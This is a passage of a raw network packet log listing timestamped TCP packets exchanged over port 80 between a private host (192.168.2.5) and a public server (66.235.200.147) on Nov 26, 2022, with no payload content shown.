Nov 26, 2022 11:17:42.377331018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377347946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377348900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377367973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377370119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377382994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377387047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377410889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377418041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377433062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377435923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377453089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377454042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377470016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377473116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377491951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377494097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377511978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377516985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377530098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377536058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377552032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377552986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377569914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377572060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377587080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377590895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377604008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377604008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377619982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377624035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377638102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377640009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377654076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377660990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377671003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377672911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377686977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377691031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377703905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377707958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377722025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377724886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377737999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377741098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377756119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377758026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377772093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377774000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377789974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377794981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377805948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377811909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377823114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377823114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377840042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377845049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377856970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377856970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377873898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377876997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377890110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377895117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377906084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377907991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377923012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377927065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377938986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377943993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377954960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377960920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377973080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377975941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.377990961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.377994061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.378006935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.378007889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.378025055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.378027916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.378041983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.378043890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.378057957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.378061056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.378074884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.378078938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.378092051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.378096104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.378113985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.378123045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395026922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395062923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395081997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395101070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395113945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395119905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395136118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395140886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395160913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395168066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395179987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395181894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395199060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395212889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395216942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395226002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395235062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395252943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395256996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395272017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395279884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395291090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395308971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395311117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395328045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395334959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395345926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395363092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395365000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395385027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395389080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395401955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395402908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395421028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395426989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395426989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395438910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395457983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395457983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395473003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395477057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395495892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395497084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395514011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395514965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395524979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395533085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395540953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395551920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395554066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395570040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395581007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395589113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395592928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395611048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395621061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395628929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395632029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395648003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395653963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395667076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395673037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395683050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395685911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395705938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395711899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395725012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395739079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395754099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395765066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395781040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395792007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395807981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395814896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395833969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395834923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395853043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395857096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395870924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395879030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395889997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395894051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395909071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395910978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395926952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395932913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395945072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395945072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395963907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395968914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.395982027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.395986080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396002054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396012068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396022081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396022081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396044970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396051884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396064043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396064997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396083117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396087885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396100998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396102905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396115065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396128893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396142006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396156073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396168947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396183968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396200895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396220922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396250010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396266937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396270037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396281958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396285057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396305084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396308899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396328926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396343946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396353006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396369934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396378040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396395922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396401882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396421909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396426916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396451950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396452904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396473885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396476030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396498919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396500111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396523952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396538973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396548033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396549940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396569014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396573067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396596909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396620989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396620989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396642923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396645069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396667957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396670103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396683931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396688938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396713018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396713972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396739006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396740913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396754026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396764040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396790028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396805048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396821976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396830082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396847963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396852970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396867037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396871090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396883965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396886110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396905899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396912098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396924019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396938086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396958113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396960974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396979094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.396982908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.396997929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397001982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397016048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397023916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397033930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397034883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397053957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397066116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397079945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397080898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397099972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397118092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397119999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397138119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397145987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397156000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397156954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397175074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397193909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397197962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397217989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397228003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397243977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397253036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397270918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397294044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397320986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397331953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397331953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397341013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397331953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397367001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397386074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397401094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397401094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397404909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397423983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397430897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397443056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397460938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397481918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397484064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397484064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397484064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397502899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397514105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397521019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397531986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397542000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397556067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397561073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397571087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397578955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397592068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397598028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397608042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397617102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397631884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397635937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397655010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397656918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397658110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397672892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397675991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397691011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397710085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397725105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397725105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397727966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397747040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397747040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397764921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397767067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397788048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397788048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397788048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397805929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397806883 CET	80	49707	66.235.200.147	192.168.2.5
